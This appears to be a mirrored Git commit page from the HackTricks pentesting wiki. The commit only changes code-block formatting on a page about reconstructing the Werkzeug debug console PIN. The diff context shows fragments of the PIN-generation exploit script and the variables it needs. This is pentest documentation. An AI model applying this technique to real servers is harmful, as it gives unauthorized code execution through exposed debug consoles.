Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-15 09:27:32 +00:00
Code Issues Projects Releases Packages Wiki Activity

GitBook: [master] one page modified

Browse source
This commit is contained in:
CPol 2020-11-22 21:53:42 +00:00 committed by gitbook-bot
parent b5f020c9ba
commit beeff878a0
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
1 changed files with 4 additions and 4 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

8
pentesting/pentesting-web/werkzeug.md
View file

@ -36,7 +36,7 @@ You can reverse the algorithm generating the console PIN. Inspect Werkzeugs d
In this file, see relevant method outlining steps to generate console PIN:
```text
```python
def get_pin_and_cookie_name(app):
pin = os.environ.get('WERKZEUG_DEBUG_PIN')
rv = None
@ -116,7 +116,7 @@ def get_pin_and_cookie_name(app):
Variables needed to exploit the console PIN:
```text
```python
probably_public_bits = [
username,
modname,
@ -141,14 +141,14 @@ To find server MAC address, need to know which network interface is being used t
Convert from hex address to decimal representation by running in python e.g.:
```text
```python
>>> print(0x5600027a23ac)
94558041547692
```
Once all variables prepared, run exploit script to generate Werkzeug console PIN:
```text
```python
import hashlib
from itertools import chain
probably_public_bits = [